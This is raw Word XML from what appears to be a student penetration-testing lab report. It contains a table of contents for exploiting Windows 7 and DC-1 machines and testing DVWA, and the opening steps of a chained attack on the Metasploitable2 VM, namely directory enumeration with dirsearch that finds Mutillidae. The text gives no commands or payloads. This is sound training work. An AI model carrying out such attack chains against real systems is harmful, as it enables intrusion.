                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit Windows 7 Machine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128486 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4204E6FE" w14:textId="6147D7DC" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128487" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit DC-1 Machine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="511E7EB5" w14:textId="1BFD8641" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128488" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>200-Word PTES Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19EFB6D4" w14:textId="6B6BD3D0" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128489" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>100-Word Non-Technical Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128489 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C45AB06" w14:textId="64DCDF6B" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128490" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lessons Learnt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128490 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37BECE03" w14:textId="63E98A23" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224128491" w:history="1">
            <w:r w:rsidRPr="00280F5D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224128491 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D16BB78" w14:textId="11654EDD" w:rsidR="0024036F" w:rsidRDefault="0024036F">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="47038D7F" w14:textId="6E58234A" w:rsidR="0024036F" w:rsidRDefault="0024036F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02883195" w14:textId="52507DD5" w:rsidR="005E73D2" w:rsidRDefault="00400A21" w:rsidP="00400A21">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc224128473"/>
      <w:r w:rsidRPr="00400A21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0D0DDE5E" w14:textId="1F415AF0" w:rsidR="00400A21" w:rsidRDefault="00D7565D" w:rsidP="00400A21">
      <w:r w:rsidRPr="00D7565D">
        <w:t>In this report I am going to explain the below findings with the help of screenshots and diagrams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582FC52" w14:textId="77777777" w:rsidR="007A277D" w:rsidRDefault="007A277D" w:rsidP="00400A21"/>
    <w:p w14:paraId="36127690" w14:textId="28BD8739" w:rsidR="007A277D" w:rsidRDefault="00054C3F" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00054C3F">
        <w:t>Simulate a chained attack on Metasploitable2 VM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D937DD7" w14:textId="2B326A01" w:rsidR="00054C3F" w:rsidRDefault="00926602" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00926602">
        <w:t>Test DVWA VM for OWASP Top 10 issues</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041B81E" w14:textId="7886FCC2" w:rsidR="002355CE" w:rsidRDefault="009F00FF" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidR="009B4C35">
        <w:t xml:space="preserve"> Web Application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerability Findin</w:t>
      </w:r>
      <w:r w:rsidR="009B4C35">
        <w:t>gs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B7ED3" w14:textId="6278182D" w:rsidR="009B4C35" w:rsidRDefault="00234E79" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Network Attack Path Diagram</w:t>
      </w:r>
      <w:r w:rsidR="0016213D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A1623" w14:textId="7BDF04B8" w:rsidR="00234E79" w:rsidRDefault="0016213D" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit Windows </w:t>
      </w:r>
      <w:r w:rsidR="00DD4027">
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:t>Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1AE11B" w14:textId="25844912" w:rsidR="0016213D" w:rsidRDefault="009B6671" w:rsidP="00054C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit DC-1 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC87264" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="44663E69" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="2471C7B6" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="02FB320D" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="35D2DED5" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="2EF97874" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="06143C24" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="1937BB7C" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="159F2C12" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="0E7214C3" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="2D9D7184" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="25F161B8" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="53D014F9" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="4A8B4A6F" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="667B5696" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="668D4399" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="1665401C" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="0C67308B" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="2C68D6EC" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="112D64F1" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="56588E70" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="7B484DF3" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="71E4F1FF" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="5682D769" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="1FF21330" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="62C37A5D" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="522B44D0" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="32721695" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="6EE8E13B" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="0E452D62" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="60940209" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="262FB22B" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="4B79200F" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="3DF8470D" w14:textId="77777777" w:rsidR="00ED730A" w:rsidRDefault="00ED730A" w:rsidP="00ED730A"/>
    <w:p w14:paraId="10DA38CB" w14:textId="6CE4DD40" w:rsidR="00ED730A" w:rsidRDefault="00674841" w:rsidP="00674841">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc224128474"/>
      <w:r w:rsidRPr="00674841">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Chained </w:t>
      </w:r>
      <w:r w:rsidR="00E95037">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00674841">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ttack on Metasploitable2 VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2B254622" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">Perform Web Enumeration using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">. Web enumeration reveals a vulnerable web application called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t>, which is intentionally vulnerable in Metasploitable2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50005493" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A359484" wp14:editId="348F6066">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43126</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2305878" cy="3511758"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="183834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49130" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2305878" cy="3511758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B97D85" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6211234B" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4683D521" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4A942782" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="30BC7BDF" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="49E8E517" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="06A97D59" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2F3A7894" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="713096E9" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="701A5DFB" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3E945168" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="5B03D9EC" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="075B7D1F" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="1A702CA4" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="6B4CCCBB" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="3574EE15" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="2F55C25E" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="2CA0199A" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="2AE2E07E" w14:textId="77777777" w:rsidR="0041690A" w:rsidRPr="00523986" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="3DCC1617" w14:textId="6522D197" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">Viewing the dashboard of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>multillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597844A6" w14:textId="03CF7D81" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="002A4ACA" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B71F7BA" wp14:editId="4A0E63B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5340129" cy="2056749"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="20320"/>
            <wp:wrapNone/>
            <wp:docPr id="140859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99096" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5340129" cy="205674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5EE7B67" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="59011C39" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1AA48FA6" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="36279E16" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="28E8701C" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7821ABE6" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3ECC8C91" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="483973D0" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="5F1CC3EF" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
